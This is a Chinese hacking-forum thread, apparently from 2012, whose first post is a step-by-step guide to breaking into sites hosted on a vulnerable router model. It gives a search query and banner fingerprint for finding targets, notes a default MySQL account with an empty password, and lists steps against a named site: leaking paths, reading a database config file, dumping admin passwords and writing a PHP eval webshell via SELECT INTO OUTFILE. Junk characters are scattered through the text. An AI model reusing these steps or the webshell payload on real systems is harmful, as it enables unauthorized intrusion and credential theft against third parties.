找回密码
 立即注册
查看: 3180|回复: 2
打印 上一主题 下一主题

利用某路由器漏洞入侵国外站点

[复制链接]
跳转到指定楼层
楼主
发表于 2012-12-10 10:30:18 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
  寻找存在漏洞的路由器方法:
0 w- D2 M" U6 |8 ^0 \) v* g4 d6 k/ L$ c6 L
1:google搜索'Raonet Subscriber Ethernet Router'
; u4 {2 k! I. Z) W, O1 W5 k+ f0 _% I$ Q: Y, U' R$ ]
2:使用WebDAVScan扫80端口,http banner为thttpd/2.21b 23apr20018 O$ r# I. z2 x% h3 w

  A0 s1 W" T9 t6 N/ ?; U3 T3:扫mysql版本号判断,SER系列路由器使用的mysql版本4.0.14,默认有一个高权限的帐户mysql,口令为空。
6 P) c# L1 \5 P5 }1 r7 K: S1 s5 @* f
//还有很多方法可以批量获取,这里不发了,请自食其力 公开了大家都玩不成......5 @" L" D, b$ R" E2 a4 I8 x! Z6 k

$ V& S0 @' R. i, h 5 d- b1 H  r" [. q1 g7 r$ o2 q

- U2 B. Z0 o$ o) y( y! }/ ^入侵步骤:3 Z5 J7 m# A$ v& a5 q
1 U+ |6 Y( T5 _* |. [
1.爆web路径,http://www.yu1u.org/src/jpgraph_line.php$ t  V6 w2 \& ~$ z
. f; `! l. X: Y  J0 a8 m! }
2:查看数据库配置文件,http://www.yu1u.org/inc/conn_db.inc5 x. D1 c8 D6 @1 s
3:得到密码后连接,查看GUI管理密码:: ?* D& J- n$ Q0 d+ g
use ser_500
8 y( a: ^  H1 u2 ?& `select id,passwd from user;5 z5 U4 c$ H! P; n: e8 r
4:通过数据库写入webshell,执行命令:; q8 l- l4 I% C8 H
use mysql;8 f8 s8 B$ \( `* B, R
create table ok(cmd TEXT);
1 N( k+ L/ ^: u( |5 b9 @) Oinsert into ok values("<?php @eval($_POST[cmd])?>");
+ J# ]0 [/ C9 g% V- a1 g8 }select * from ok into outfile "\/usr\/local\/www\/data\/src\/shell.php";  W5 V8 d5 X4 n) C* G6 I
drop table ok;
& F# a- t- x6 c4 e5 W5 s8 ]' J+ k1 ?( D+ d! T, j
5:连接后门shell.php : z: ^# H# [4 e3 Y7 F, o/ X* R% P
- {7 g+ S4 [. @. O7 E. l4 `
6. 搞定!1 F' Q9 ~& K" {# k. U" F3 H6 Q$ d
& `6 E& W7 h: J. H6 o+ U
回复

使用道具 举报

沙发
发表于 2013-7-27 20:06:50 | 只看该作者
这个后果可以很严重的说
回复 支持 反对

使用道具 举报

板凳
发表于 2013-7-29 12:07:54 | 只看该作者
不错哦,黑服务器补洞。。
回复 支持 反对

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表